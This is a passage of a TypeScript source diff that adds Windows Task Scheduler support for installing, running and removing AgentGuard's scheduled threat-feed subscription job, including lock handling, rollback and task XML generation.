   id?: string;
@@ -90,6 +105,186 @@ export function localTimeZone(): string {
   return Intl.DateTimeFormat().resolvedOptions().timeZone || 'UTC';
 }
 
+export function cronMatchesAt(expression: string, timezone: string, at: Date): boolean {
+  const schedule = validateCronExpression(expression);
+  const minuteStartMs = Math.floor(at.getTime() / 60_000) * 60_000;
+  const cron = new Cron(schedule, { timezone, paused: true });
+  return cron.nextRun(new Date(minuteStartMs - 1))?.getTime() === minuteStartMs;
+}
+
+interface WindowsCronTaskConfig {
+  version: 1;
+  name: string;
+  cronExpression: string;
+  timezone: string;
+  quiet: boolean;
+  agentGuardHome: string;
+  nodeExecutable: string;
+  cliEntrypoint: string;
+}
+
+interface WindowsCronTaskState {
+  version: 1;
+  lastCheckedMinute: string;
+}
+
+interface WindowsCronRunnerLock {
+  version: 1;
+  pid: number;
+  startedAtMs: number;
+}
+
+interface WindowsRunnerProcessIdentity {
+  pid: number;
+  executablePath: string;
+  commandLine: string;
+  creationTimeMs: number;
+}
+
+export async function runWindowsCronTick(
+  configPath: string,
+  adapters: {
+    now?: () => Date;
+    runCommand?: CommandRunner;
+  } = {},
+): Promise<{ ran: boolean; reason: 'executed' | 'not-due' | 'already-checked' | 'busy' }> {
+  const config = readWindowsCronTaskConfig(configPath);
+  const now = adapters.now?.() ?? new Date();
+  const minuteMs = Math.floor(now.getTime() / 60_000) * 60_000;
+  const minute = new Date(minuteMs).toISOString();
+  const statePath = `${configPath}.state.json`;
+  const lockPath = `${configPath}.lock`;
+  let lock: Awaited<ReturnType<typeof open>>;
+  try {
+    lock = await open(lockPath, 'wx', 0o600);
+  } catch (error) {
+    if ((error as NodeJS.ErrnoException).code === 'EEXIST') {
+      const lockStat = await stat(lockPath).catch(() => null);
+      if (!lockStat || now.getTime() - lockStat.mtimeMs <= 10 * 60_000) {
+        return { ran: false, reason: 'busy' };
+      }
+      await rm(lockPath, { force: true });
+      try {
+        lock = await open(lockPath, 'wx', 0o600);
+      } catch (retryError) {
+        if ((retryError as NodeJS.ErrnoException).code === 'EEXIST') {
+          return { ran: false, reason: 'busy' };
+        }
+        throw retryError;
+      }
+    } else {
+      throw error;
+    }
+  }
+
+  try {
+    const lockMetadata: WindowsCronRunnerLock = {
+      version: 1,
+      pid: process.pid,
+      startedAtMs: now.getTime(),
+    };
+    await lock.writeFile(`${JSON.stringify(lockMetadata)}\n`);
+    let state: WindowsCronTaskState | null;
+    try {
+      state = readWindowsCronTaskState(statePath);
+    } catch {
+      const corruptPath = `${statePath}.corrupt-${now.getTime()}`;
+      await rename(statePath, corruptPath).catch(async () => {
+        await rm(statePath, { force: true });
+      });
+      state = null;
+    }
+    if (state?.lastCheckedMinute === minute) {
+      return { ran: false, reason: 'already-checked' };
+    }
+    const due = state
+      ? cronHasOccurrenceBetween(config.cronExpression, config.timezone, new Date(state.lastCheckedMinute), new Date(minuteMs))
+      : cronMatchesAt(config.cronExpression, config.timezone, now);
+    const nextState: WindowsCronTaskState = { version: 1, lastCheckedMinute: minute };
+    await atomicWritePrivateFile(statePath, `${JSON.stringify(nextState, null, 2)}\n`);
+    if (!due) {
+      return { ran: false, reason: 'not-due' };
+    }
+
+    const args = [
+      config.cliEntrypoint,
+      'subscribe',
+      ...(config.quiet ? ['--quiet'] : []),
+      '--json',
+      '--cron-run',
+    ];
+    const runCommand = adapters.runCommand ?? execCommand;
+    const logPath = join(config.agentGuardHome, 'feed-cron.log');
+    try {
+      const result = await runCommand(config.nodeExecutable, args, undefined, {
+        env: { ...process.env, AGENTGUARD_HOME: config.agentGuardHome },
+        timeoutMs: 300_000,
+      });
+      const output = `${result.stdout}${result.stderr}`;
+      if (output) await appendFile(logPath, output, { encoding: 'utf8', mode: 0o600 });
+    } catch (error) {
+      await appendFile(logPath, `${error instanceof Error ? error.message : String(error)}\n`, { encoding: 'utf8', mode: 0o600 });
+      throw error;
+    }
+    return { ran: true, reason: 'executed' };
+  } finally {
+    await lock.close().catch(() => undefined);
+    await rm(lockPath, { force: true }).catch(() => undefined);
+  }
+}
+
+function cronHasOccurrenceBetween(expression: string, timezone: string, after: Date, through: Date): boolean {
+  const schedule = validateCronExpression(expression);
+  const cron = new Cron(schedule, { timezone, paused: true });
+  const next = cron.nextRun(after);
+  return Boolean(next && next.getTime() <= through.getTime());
+}
+
+function readWindowsCronTaskConfig(configPath: string): WindowsCronTaskConfig {
+  let parsed: unknown;
+  try {
+    parsed = JSON.parse(readFileSync(configPath, 'utf8'));
+  } catch (error) {
+    throw new Error(`Could not read Windows cron config ${configPath}: ${error instanceof Error ? error.message : String(error)}`);
+  }
+  if (!parsed || typeof parsed !== 'object') {
+    throw new Error(`Invalid Windows cron config ${configPath}.`);
+  }
+  const value = parsed as Partial<WindowsCronTaskConfig>;
+  if (
+    value.version !== 1 ||
+    typeof value.name !== 'string' || !value.name ||
+    typeof value.cronExpression !== 'string' ||
+    typeof value.timezone !== 'string' || !value.timezone ||
+    typeof value.quiet !== 'boolean' ||
+    typeof value.agentGuardHome !== 'string' || !value.agentGuardHome ||
+    typeof value.nodeExecutable !== 'string' || !value.nodeExecutable ||
+    typeof value.cliEntrypoint !== 'string' || !value.cliEntrypoint
+  ) {
+    throw new Error(`Invalid Windows cron config ${configPath}.`);
+  }
+  validateCronExpression(value.cronExpression);
+  return value as WindowsCronTaskConfig;
+}
+
+function isUnreadableWindowsCronConfigError(error: unknown): boolean {
+  const message = error instanceof Error ? error.message : String(error);
+  return message.startsWith('Could not read Windows cron config ') || message.startsWith('Invalid Windows cron config ');
+}
+
+function readWindowsCronTaskState(statePath: string): WindowsCronTaskState | null {
+  if (!existsSync(statePath)) return null;
+  try {
+    const value = JSON.parse(readFileSync(statePath, 'utf8')) as Partial<WindowsCronTaskState>;
+    if (value.version !== 1 || typeof value.lastCheckedMinute !== 'string' || !Number.isFinite(Date.parse(value.lastCheckedMinute))) {
+      throw new Error('invalid state');
+    }
+    return value as WindowsCronTaskState;
+  } catch (error) {
+    throw new Error(`Could not read Windows cron state ${statePath}: ${error instanceof Error ? error.message : String(error)}`);
+  }
+}
+
 export async function installThreatFeedCron(
   options: {
     name: string;
@@ -105,12 +300,17 @@ export async function installThreatFeedCron(
   adapters: {
     gateway?: OpenClawGatewayOptions;
     runCommand?: CommandRunner;
+    platform?: NodeJS.Platform;
+    nodeExecutable?: string;
+    cliEntrypoint?: string;
+    now?: () => Date;
   } = {}
 ): Promise<OpenClawCronInstallResult> {
   const backend = options.backend ?? 'auto';
+  const platform = adapters.platform ?? process.platform;
   if (backend === 'auto' && !options.agentHost) {
     throw new Error(
-      'Cron target auto requires a saved agent host. Run `agentguard init --agent <claude-code|codex|openclaw|hermes|qclaw|dsh>` first, or pass `--cron-target openclaw`, `--cron-target qclaw`, `--cron-target hermes`, or `--cron-target system`.'
+      'Cron target auto requires a saved agent host. Run `agentguard init --agent <claude-code|codex|openclaw|hermes|qclaw|dsh>` first, or pass `--cron-target openclaw`, `--cron-target qclaw`, `--cron-target hermes`, `--cron-target system`, or `--cron-target windows`.'
     );
   }
   if (backend === 'openclaw' && options.agentHost && options.agentHost !== 'openclaw') {
@@ -118,6 +318,20 @@ export async function installThreatFeedCron(
       `Cron target openclaw conflicts with saved agent host "${options.agentHost}". ` +
       'Run `agentguard init --agent openclaw` first, omit `--cron-target` to use auto, or choose a different cron target.'
     );
+  }
+  if (backend === 'windows' || (
+    backend === 'auto' &&
+    platform === 'win32' &&
+    options.agentHost !== 'openclaw' &&
+    options.agentHost !== 'qclaw' &&
+    options.agentHost !== 'hermes'
+  )) {
+    return installWindowsThreatFeedTask(options, {
+      runCommand: adapters.runCommand,
+      nodeExecutable: adapters.nodeExecutable,
+      cliEntrypoint: adapters.cliEntrypoint,
+      now: adapters.now,
+    });
   }
   if (backend === 'system' || (backend === 'auto' && options.agentHost !== 'openclaw' && options.agentHost !== 'qclaw' && options.agentHost !== 'hermes')) {
     return installSystemThreatFeedCron(options, adapters.runCommand);
@@ -161,7 +375,463 @@ export async function installThreatFeedCron(
     return result;
   }
 
-  throw new Error('Invalid cron target. Use auto, openclaw, qclaw, hermes, or system.');
+  throw new Error('Invalid cron target. Use auto, openclaw, qclaw, hermes, system, or windows.');
+}
+
+async function installWindowsThreatFeedTask(
+  options: {
+    name: string;
+    cronExpression: string;
+    quiet: boolean;
+    force: boolean;
+    agentGuardHome?: string;
+    timezone?: string;
+  },
+  adapters: {
+    runCommand?: CommandRunner;
+    nodeExecutable?: string;
+    cliEntrypoint?: string;
+    now?: () => Date;
+  } = {}
+): Promise<OpenClawCronInstallResult> {
+  const runCommand = adapters.runCommand ?? execCommand;
+  const schedule = validateCronExpression(options.cronExpression);
+  const timezone = options.timezone ?? localTimeZone();
+  new Cron(schedule, { timezone, paused: true });
+  const home = validateWindowsTaskActionPath(options.agentGuardHome ?? join(homedir(), '.agentguard'), 'AGENTGUARD_HOME');
+  const nodeExecutable = validateWindowsTaskActionPath(adapters.nodeExecutable ?? process.execPath, 'Node executable');
+  const cliEntrypoint = validateWindowsTaskActionPath(adapters.cliEntrypoint ?? join(__dirname, '..', 'cli.js'), 'AgentGuard CLI entrypoint');
+  const taskName = `AgentGuard-${sanitizeCronJobId(options.name)}`;
+  const jobId = sanitizeCronJobId(options.name);
+  const scriptsDir = join(home, 'scripts');
+  const configPath = join(scriptsDir, `${jobId}.windows-cron.json`);
+  const xmlPath = join(scriptsDir, `${jobId}.task.xml`);
+  let exists = true;
+  let existingXml = '';
+  try {
+    existingXml = (await runCommand('schtasks.exe', ['/Query', '/TN', taskName, '/XML', '/HRESULT'])).stdout;
+  } catch (error) {
+    if (isWindowsTaskNotFoundError(error)) {
+      exists = false;
+    } else {
+      throw new Error(`Could not query Windows scheduled task "${taskName}": ${error instanceof Error ? error.message : String(error)}`);
+    }
+  }
+  let userSid: string | undefined;
+  let existingWasEnabled = true;
+  if (exists) {
+    assertManagedWindowsTaskEnvelope(existingXml, configPath, options.name);
+    userSid = await currentWindowsUserSid(runCommand);
+    assertManagedWindowsTaskEnvelope(existingXml, configPath, options.name, userSid);
+    existingWasEnabled = windowsTaskEnabled(existingXml);
+    if (!options.force) {
+      const existingConfig = readManagedWindowsTaskConfig(existingXml, configPath, options.name, userSid);
+      return {
+        name: options.name,
+        schedule: existingConfig.cronExpression,
+        timezone: existingConfig.timezone,
+        created: false,
+        backend: 'windows-task-scheduler',
+        command: threatFeedCommand(existingConfig.quiet),
+        script: configPath,
+      };
+    }
+    try {
+      readManagedWindowsTaskConfig(existingXml, configPath, options.name, userSid);
+    } catch (error) {
+      if (!isUnreadableWindowsCronConfigError(error)) throw error;
+      assertManagedWindowsTaskAction(existingXml, configPath, options.name, nodeExecutable, cliEntrypoint);
+    }
+  }
+
+  userSid ??= await currentWindowsUserSid(runCommand);
+  await mkdir(scriptsDir, { recursive: true });
+  const previousConfig = existsSync(configPath) ? readFileSync(configPath) : null;
+  const previousXml = existsSync(xmlPath) ? readFileSync(xmlPath) : null;
+  let disabledForReplacement = false;
+  let registeredReplacement = false;
+  try {
+    if (exists && options.force) {
+      await runCommand('schtasks.exe', ['/Change', '/TN', taskName, '/Disable']);
+      disabledForReplacement = true;
+      await stopWindowsTaskInstance(runCommand, taskName, `${configPath}.lock`);
+    }
+    await atomicWritePrivateFile(configPath, `${JSON.stringify({
+      version: 1,
+      name: options.name,
+      cronExpression: schedule,
+      timezone,
+      quiet: options.quiet,
+      agentGuardHome: home,
+      nodeExecutable,
+      cliEntrypoint,
+    }, null, 2)}\n`);
+    await atomicWritePrivateFile(xmlPath, encodeUtf16LeWithBom(windowsTaskXml({
+      userSid,
+      nodeExecutable,
+      cliEntrypoint,
+      configPath,
+      startBoundary: nextMinuteBoundary(adapters.now?.() ?? new Date()),
+    })));
+    await runCommand('schtasks.exe', [
+      '/Create',
+      '/TN',
+      taskName,
+      '/XML',
+      xmlPath,
+      '/F',
+      '/HRESULT',
+    ]);
+    registeredReplacement = true;
+    if (options.force) {
+      await Promise.all([
+        rm(`${configPath}.state.json`, { force: true }),
+        rm(`${configPath}.lock`, { force: true }),
+      ]);
+    }
+  } catch (error) {
+    let rollbackError: unknown;
+    if (registeredReplacement) {
+      try {
+        await restoreRegisteredWindowsTask(runCommand, taskName, xmlPath, exists ? existingXml : null);
+      } catch (taskRollbackError) {
+        rollbackError = taskRollbackError;
+      }
+    }
+    await Promise.all([
+      restoreWindowsTaskArtifact(configPath, previousConfig),
+      restoreWindowsTaskArtifact(xmlPath, previousXml),
+    ]);
+    if (!registeredReplacement && disabledForReplacement && existingWasEnabled) {
+      await runCommand('schtasks.exe', ['/Change', '/TN', taskName, '/Enable']).catch(() => undefined);
+    }
+    if (rollbackError) {
+      throw new Error(
+        `${error instanceof Error ? error.message : String(error)}; could not restore the previously registered Windows task: ` +
+        `${rollbackError instanceof Error ? rollbackError.message : String(rollbackError)}`,
+      );
+    }
+    throw error;
+  }
+  return {
+    name: options.name,
+    schedule,
+    timezone,
+    created: true,
+    backend: 'windows-task-scheduler',
+    command: threatFeedCommand(options.quiet),
+    script: configPath,
+  };
+}
+
+async function restoreRegisteredWindowsTask(
+  runCommand: CommandRunner,
+  taskName: string,
+  xmlPath: string,
+  previousTaskXml: string | null,
+): Promise<void> {
+  if (previousTaskXml === null) {
+    await runCommand('schtasks.exe', ['/Delete', '/TN', taskName, '/F']);
+    return;
+  }
+  const rollbackPath = `${xmlPath}.rollback-${process.pid}-${randomUUID()}`;
+  try {
+    const utf16Xml = previousTaskXml.replace(
+      /^(\s*<\?xml\s+[^>]*encoding=["'])(?:UTF-8|UTF-16)(["'][^>]*\?>)/i,
+      '$1UTF-16$2',
+    );
+    await writeFile(rollbackPath, encodeUtf16LeWithBom(utf16Xml), { mode: 0o600 });
+    await runCommand('schtasks.exe', ['/Create', '/TN', taskName, '/XML', rollbackPath, '/F', '/HRESULT']);
+  } finally {
+    await rm(rollbackPath, { force: true }).catch(() => undefined);
+  }
+}
+
+async function restoreWindowsTaskArtifact(path: string, previous: Buffer | null): Promise<void> {
+  if (previous) {
+    await writeFile(path, previous, { mode: 0o600 });
+  } else {
+    await rm(path, { force: true });
+  }
+}
+
+async function atomicWritePrivateFile(path: string, content: string | Buffer): Promise<void> {
+  const temporaryPath = `${path}.tmp-${process.pid}-${randomUUID()}`;
+  try {
+    await writeFile(temporaryPath, content, { mode: 0o600 });
+    await rename(temporaryPath, path);
+  } finally {
+    await rm(temporaryPath, { force: true }).catch(() => undefined);
+  }
+}
+
+function validateWindowsTaskActionPath(value: string, label: string): string {
+  if (!isAbsolute(value) && !win32.isAbsolute(value)) {
+    throw new Error(`${label} must be an absolute path for Windows Task Scheduler installation.`);
+  }
+  if (/[\u0000-\u001F\u007F"%]/.test(value)) {
+    throw new Error(`${label} must not contain quotes, %, or control characters for Windows Task Scheduler installation.`);
+  }
+  return value;
+}
+
+function readManagedWindowsTaskConfig(
+  xml: string,
+  configPath: string,
+  expectedName: string,
+  expectedUserSid?: string,
+): WindowsCronTaskConfig {
+  assertManagedWindowsTaskEnvelope(xml, configPath, expectedName, expectedUserSid);
+  const config = readWindowsCronTaskConfig(configPath);
+  if (config.name !== expectedName) {
+    throw new Error(`Windows scheduled task "AgentGuard-${sanitizeCronJobId(expectedName)}" has mismatched AgentGuard metadata.`);
+  }
+  validateWindowsTaskActionPath(config.agentGuardHome, 'Managed AGENTGUARD_HOME');
+  validateWindowsTaskActionPath(config.nodeExecutable, 'Managed Node executable');
+  validateWindowsTaskActionPath(config.cliEntrypoint, 'Managed AgentGuard CLI entrypoint');
+  if (
+    join(config.agentGuardHome, 'scripts', `${sanitizeCronJobId(expectedName)}.windows-cron.json`) !== configPath
+  ) {
+    throw new Error(`Windows scheduled task "AgentGuard-${sanitizeCronJobId(expectedName)}" has mismatched AgentGuard action metadata.`);
+  }
+  assertManagedWindowsTaskAction(xml, configPath, expectedName, config.nodeExecutable, config.cliEntrypoint);
+  return config;
+}
+
+function assertManagedWindowsTaskAction(
+  xml: string,
+  configPath: string,
+  expectedName: string,
+  nodeExecutable: string,
+  cliEntrypoint: string,
+): void {
+  const decoded = decodeXmlText(xml);
+  const execBlocks = [...decoded.matchAll(/<Exec(?:\s[^>]*)?>([\s\S]*?)<\/Exec>/gi)];
+  const command = execBlocks[0]?.[1]?.match(/<Command>([\s\S]*?)<\/Command>/i)?.[1]?.trim();
+  const argumentsValue = execBlocks[0]?.[1]?.match(/<Arguments>([\s\S]*?)<\/Arguments>/i)?.[1]?.trim();
+  const expectedArguments = `${windowsCommandLineQuote(cliEntrypoint)} windows-cron-run --config ${windowsCommandLineQuote(configPath)}`;
+  if (execBlocks.length !== 1 || command !== nodeExecutable || argumentsValue !== expectedArguments) {
+    throw new Error(`Windows scheduled task "AgentGuard-${sanitizeCronJobId(expectedName)}" has mismatched AgentGuard action metadata.`);
+  }
+}
+
+function assertManagedWindowsTaskEnvelope(
+  xml: string,
+  configPath: string,
+  expectedName: string,
+  expectedUserSid?: string,
+): void {
+  const decoded = decodeXmlText(xml);
+  const expectedAction = ` windows-cron-run --config ${windowsCommandLineQuote(configPath)}`;
+  const principals = [...decoded.matchAll(/<Principal(?:\s[^>]*)?>([\s\S]*?)<\/Principal>/gi)];
+  const principal = principals[0]?.[1] ?? '';
+  const logonType = principal.match(/<LogonType>([\s\S]*?)<\/LogonType>/i)?.[1]?.trim();
+  const runLevel = principal.match(/<RunLevel>([\s\S]*?)<\/RunLevel>/i)?.[1]?.trim();
+  const userSid = principal.match(/<UserId>([\s\S]*?)<\/UserId>/i)?.[1]?.trim();
+  if (
+    !decoded.includes(expectedAction) ||
+    principals.length !== 1 ||
+    logonType !== 'InteractiveToken' ||
+    runLevel !== 'LeastPrivilege' ||
+    (expectedUserSid !== undefined && userSid !== expectedUserSid)
+  ) {
+    throw new Error(`Windows scheduled task "AgentGuard-${sanitizeCronJobId(expectedName)}" is not a managed AgentGuard task.`);
+  }
+}
+
+function windowsTaskEnabled(xml: string): boolean {
+  const decoded = decodeXmlText(xml);
+  const settings = decoded.match(/<Settings(?:\s[^>]*)?>([\s\S]*?)<\/Settings>/i)?.[1];
+  const enabled = settings?.match(/<Enabled>(true|false)<\/Enabled>/i)?.[1];
+  return enabled?.toLowerCase() !== 'false';
+}
+
+async function stopWindowsTaskInstance(
+  runCommand: CommandRunner,
+  taskName: string,
+  lockPath: string,
+): Promise<void> {
+  const initialLockStat = await stat(lockPath).catch(() => null);
+  const hasFreshLock = Boolean(initialLockStat && Date.now() - initialLockStat.mtimeMs <= 10 * 60_000);
+  const initialLock = hasFreshLock
+    ? readWindowsCronRunnerLock(lockPath)
+    : null;
+  if (hasFreshLock && !initialLock) {
+    throw new Error(`Could not stop active Windows scheduled task "${taskName}": runner lock metadata is incomplete or invalid.`);
+  }
+  let processTreeStopped = false;
+  if (initialLock) {
+    try {
+      await verifyWindowsRunnerProcess(runCommand, lockPath, initialLock);
+      await runCommand('taskkill.exe', ['/PID', String(initialLock.pid), '/T', '/F']);
+      processTreeStopped = true;
+    } catch (error) {
+      throw new Error(`Could not stop active Windows scheduled task "${taskName}" process tree: ${error instanceof Error ? error.message : String(error)}`);
+    }
+  }
+  try {
+    await runCommand('schtasks.exe', ['/End', '/TN', taskName]);
+  } catch (error) {
+    if (processTreeStopped) {
+      await rm(lockPath, { force: true });
+      return;
+    }
+    const lockStat = await stat(lockPath).catch(() => null);
+    if (!lockStat) return;
+    if (Date.now() - lockStat.mtimeMs > 10 * 60_000) {
+      await rm(lockPath, { force: true });
+      return;
+    }
+    throw new Error(`Could not stop active Windows scheduled task "${taskName}": ${error instanceof Error ? error.message : String(error)}`);
+  }
+  await rm(lockPath, { force: true });
+}
+
+async function verifyWindowsRunnerProcess(
+  runCommand: CommandRunner,
+  lockPath: string,
+  lock: WindowsCronRunnerLock,
+): Promise<void> {
+  const configPath = lockPath.endsWith('.lock') ? lockPath.slice(0, -'.lock'.length) : '';
+  const config = readWindowsCronTaskConfig(configPath);
+  const script = [
+    "$ErrorActionPreference = 'Stop'",
+    "$process = Get-CimInstance -ClassName Win32_Process -Filter ('ProcessId = ' + $env:AGENTGUARD_RUNNER_PID)",
+    "if ($null -eq $process) { throw 'Runner process was not found.' }",
+    '$created = [DateTimeOffset]$process.CreationDate',
+    '[pscustomobject]@{ pid = [int]$process.ProcessId; executablePath = [string]$process.ExecutablePath; commandLine = [string]$process.CommandLine; creationTimeMs = $created.ToUnixTimeMilliseconds() } | ConvertTo-Json -Compress',
+  ].join('; ');
+  const result = await runCommand('powershell.exe', ['-NoProfile', '-NonInteractive', '-Command', script], undefined, {
+    env: { ...process.env, AGENTGUARD_RUNNER_PID: String(lock.pid) },
+    timeoutMs: 10_000,
+  });
+  let identity: Partial<WindowsRunnerProcessIdentity>;
+  try {
+    identity = JSON.parse(result.stdout) as Partial<WindowsRunnerProcessIdentity>;
+  } catch {
+    throw new Error('Windows runner process identity query returned invalid JSON.');
+  }
+  const expectedArguments = `${windowsCommandLineQuote(config.cliEntrypoint)} windows-cron-run --config ${windowsCommandLineQuote(configPath)}`;
+  if (
+    identity.pid !== lock.pid ||
+    typeof identity.executablePath !== 'string' ||
+    win32.normalize(identity.executablePath).toLowerCase() !== win32.normalize(config.nodeExecutable).toLowerCase() ||
+    typeof identity.commandLine !== 'string' || !identity.commandLine.includes(expectedArguments) ||
+    typeof identity.creationTimeMs !== 'number' ||
+    !Number.isFinite(identity.creationTimeMs) ||
+    Math.abs(identity.creationTimeMs - lock.startedAtMs) > 120_000
+  ) {
+    throw new Error(`PID ${lock.pid} does not match the managed Windows runner.`);
+  }
+}
+
+function readWindowsCronRunnerLock(lockPath: string): WindowsCronRunnerLock | null {
+  try {
+    const value = JSON.parse(readFileSync(lockPath, 'utf8')) as Partial<WindowsCronRunnerLock>;
+    if (
+      value.version !== 1 ||
+      !Number.isSafeInteger(value.pid) || (value.pid ?? 0) <= 0 ||
+      typeof value.startedAtMs !== 'number' || !Number.isFinite(value.startedAtMs)
+    ) {
+      return null;
+    }
+    return value as WindowsCronRunnerLock;
+  } catch {
+    return null;
+  }
+}
+
+async function currentWindowsUserSid(runCommand: CommandRunner): Promise<string> {
+  const sidResult = await runCommand('whoami.exe', ['/User', '/FO', 'CSV', '/NH']);
+  const userSid = sidResult.stdout.match(/S-\d-\d+(?:-\d+)+/i)?.[0];
+  if (!userSid) {
+    throw new Error('Could not determine the current Windows user SID for Task Scheduler registration.');
+  }
+  return userSid;
+}
+
+function decodeXmlText(value: string): string {
+  return value
+    .replaceAll('&quot;', '"')
+    .replaceAll('&apos;', "'")
+    .replaceAll('&gt;', '>')
+    .replaceAll('&lt;', '<')
+    .replaceAll('&amp;', '&');
+}
+
+function isWindowsTaskNotFoundError(error: unknown): boolean {
+  const exitCode = (error as { exitCode?: unknown } | null)?.exitCode;
+  return exitCode === 0x80070002 || exitCode === -2147024894 || exitCode === 2;
+}
+
+function windowsTaskXml(options: {
+  userSid: string;
+  nodeExecutable: string;
+  cliEntrypoint: string;
+  configPath: string;
+  startBoundary: string;
+}): string {
+  const argumentsValue = `${windowsCommandLineQuote(options.cliEntrypoint)} windows-cron-run --config ${windowsCommandLineQuote(options.configPath)}`;
+  return [
+    '<?xml version="1.0" encoding="UTF-16"?>',
+    '<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">',
+    '  <Triggers>',
+    '    <TimeTrigger>',
+    `      <StartBoundary>${xmlEscape(options.startBoundary)}</StartBoundary>`,
+    '      <Enabled>true</Enabled>',
+    '      <Repetition>',
+    '        <Interval>PT1M</Interval>',
+    '        <StopAtDurationEnd>false</StopAtDurationEnd>',
+    '      </Repetition>',
+    '    </TimeTrigger>',
+    '  </Triggers>',
+    '  <Principals>',
+    '    <Principal id="Author">',
+    `      <UserId>${xmlEscape(options.userSid)}</UserId>`,
+    '      <LogonType>InteractiveToken</LogonType>',
+    '      <RunLevel>LeastPrivilege</RunLevel>',
+    '    </Principal>',
+    '  </Principals>',
+    '  <Settings>',
+    '    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>',
+    '    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>',
+    '    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>',
+    '    <StartWhenAvailable>true</StartWhenAvailable>',
+    '    <ExecutionTimeLimit>PT10M</ExecutionTimeLimit>',
+    '    <Enabled>true</Enabled>',
+    '  </Settings>',
+    '  <Actions Context="Author">',
+    '    <Exec>',
+    `      <Command>${xmlEscape(options.nodeExecutable)}</Command>`,
+    `      <Arguments>${xmlEscape(argumentsValue)}</Arguments>`,
+    '    </Exec>',
+    '  </Actions>',
+    '</Task>',
+    '',
+  ].join('\r\n');
+}
+
+function encodeUtf16LeWithBom(value: string): Buffer {
+  return Buffer.concat([Buffer.from([0xff, 0xfe]), Buffer.from(value, 'utf16le')]);
+}
+
+function nextMinuteBoundary(now: Date): string {
+  const next = new Date(Math.floor(now.getTime() / 60_000) * 60_000 + 60_000);
+  const pad = (value: number) => String(value).padStart(2, '0');
+  return `${next.getFullYear()}-${pad(next.getMonth() + 1)}-${pad(next.getDate())}T${pad(next.getHours())}:${pad(next.getMinutes())}:00`;
+}
+
+function xmlEscape(value: string): string {
+  return value
+    .replaceAll('&', '&amp;')
+    .replaceAll('<', '&lt;')
+    .replaceAll('>', '&gt;')
+    .replaceAll('"', '&quot;')
+    .replaceAll("'", '&apos;');
+}
+
+function windowsCommandLineQuote(value: string): string {
+  return `"${value.replace(/(\\*)"/g, '$1$1\\"').replace(/(\\+)$/g, '$1$1')}"`;
 }
 
 export async function removeThreatFeedCron(
@@ -175,14 +845,20 @@ export async function removeThreatFeedCron(
   adapters: {
     gateway?: OpenClawGatewayOptions;
     runCommand?: CommandRunner;
+    platform?: NodeJS.Platform;
   } = {}
 ): Promise<ThreatFeedCronRemovalResult[]> {
   const backend = options.backend ?? 'auto';
+  const platform = adapters.platform ?? process.platform;
   if (backend === 'all') {
-    return removeThreatFeedCronFromBackends(options, ['system', 'hermes', 'openclaw', 'openclaw-gateway', 'qclaw-gateway'], adapters);
+    const localBackend: ResolvedCronBackend = platform === 'win32' ? 'windows-task-scheduler' : 'system';
+    return removeThreatFeedCronFromBackends(options, [localBackend, 'hermes', 'openclaw', 'openclaw-gateway', 'qclaw-gateway'], adapters);
   }
   if (backend === 'system') {
     return [await removeSystemThreatFeedCron(options, adapters.runCommand)];
+  }
+  if (backend === 'windows') {
+    return [await removeWindowsThreatFeedTask(options, adapters.runCommand)];
   }
   if (backend === 'hermes') {
     return [await removeHermesThreatFeedCron(options, adapters.runCommand)];
@@ -194,7 +870,7 @@ export async function removeThreatFeedCron(
     return [await removeGatewayThreatFeedCron(options, qclawGatewayOptions(adapters.gateway), 'qclaw-gateway')];
   }
 
-  const targets: ResolvedCronBackend[] = ['system'];
+  const targets: ResolvedCronBackend[] = platform === 'win32' ? ['windows-task-scheduler'] : ['system'];
   if (options.agentHost === 'hermes') targets.push('hermes');
   if (options.agentHost === 'openclaw') targets.push('openclaw', 'openclaw-gateway');
   if (options.agentHost === 'qclaw') targets.push('qclaw-gateway');
@@ -217,6 +893,8 @@ async function removeThreatFeedCronFromBackends(
   for (const backend of backends) {
     if (backend === 'system') {
       results.push(await removeSystemThreatFeedCron(options, adapters.runCommand));
+    } else if (backend === 'windows-task-scheduler') {
+      results.push(await removeWindowsThreatFeedTask(options, adapters.runCommand));
     } else if (backend === 'hermes') {
       results.push(await removeHermesThreatFeedCron(options, adapters.runCommand));
     } else if (backend === 'openclaw') {
@@ -228,6 +906,155 @@ async function removeThreatFeedCronFromBackends(
     }
   }
   return results;
+}
+
+async function removeWindowsThreatFeedTask(
+  options: {
+    name: string;
+    agentGuardHome?: string;
+  },
+  runCommand: CommandRunner = execCommand,
+): Promise<ThreatFeedCronRemovalResult> {
+  const taskName = `AgentGuard-${sanitizeCronJobId(options.name)}`;
+  const home = validateCronFilesystemPath(options.agentGuardHome ?? join(homedir(), '.agentguard'), 'AGENTGUARD_HOME');
+  const configPath = join(home, 'scripts', `${sanitizeCronJobId(options.name)}.windows-cron.json`);
+  let existingWasEnabled = true;
+  try {
+    const xml = (await runCommand('schtasks.exe', ['/Query', '/TN', taskName, '/XML', '/HRESULT'])).stdout;
+    assertManagedWindowsTaskEnvelope(xml, configPath, options.name);
+    const userSid = await currentWindowsUserSid(runCommand);
+    readManagedWindowsTaskConfig(xml, configPath, options.name, userSid);
+    existingWasEnabled = windowsTaskEnabled(xml);
+  } catch (error) {
+    if (isWindowsTaskNotFoundError(error)) {
+      try {
+        await cleanupWindowsTaskArtifacts(home, options.name);
+        return { name: options.name, backend: 'windows-task-scheduler', removed: false };
+      } catch (cleanupError) {
+        return {
+          name: options.name,
+          backend: 'windows-task-scheduler',
+          removed: false,
+          error: cleanupError instanceof Error ? cleanupError.message : String(cleanupError),
+        };
+      }
+    }
+    return {
+      name: options.name,
+      backend: 'windows-task-scheduler',
+      removed: false,
+      error: error instanceof Error ? error.message : String(error),
+    };
+  }
+
+  let disabledForRemoval = false;
+  let taskDeleted = false;
+  try {
+    await runCommand('schtasks.exe', ['/Change', '/TN', taskName, '/Disable']);
+    disabledForRemoval = true;
+    await stopWindowsTaskInstance(runCommand, taskName, `${configPath}.lock`);
+    await runCommand('schtasks.exe', ['/Delete', '/TN', taskName, '/F']);
+    taskDeleted = true;
+    await cleanupWindowsTaskArtifacts(home, options.name);
+    return { name: options.name, backend: 'windows-task-scheduler', removed: true };
+  } catch (error) {
+    if (isWindowsTaskNotFoundError(error)) {
+      try {
+        await cleanupWindowsTaskArtifacts(home, options.name);
+        return { name: options.name, backend: 'windows-task-scheduler', removed: false };
+      } catch (cleanupError) {
+        error = cleanupError;
+      }
+    }
